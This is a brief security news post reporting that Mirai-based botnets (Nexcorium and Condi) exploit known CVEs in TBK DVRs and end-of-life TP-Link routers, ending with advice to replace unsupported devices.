Threat actors are actively exploiting vulnerabilities in TBK DVR devices and end-of-life (EoL) TP-Link routers to deploy Mirai-based botnet variants, specifically Nexcorium and Condi. Research from Fortinet and Unit 42 highlights the use of CVE-2024-3721 and CVE-2023-33538 to gain initial access and establish persistent command-and-control for launching DDoS attacks.
The Nexcorium variant features advanced persistence mechanisms using crontab and systemd, alongside brute-force capabilities targeting Telnet services and exploitation of older flaws like CVE-2017-17215. Security experts emphasize the ongoing risk posed by unpatched IoT devices and default credentials, urging users to replace EoL hardware that no longer receives security updates to prevent recruitment into botnet infrastructures.
Top comments (0)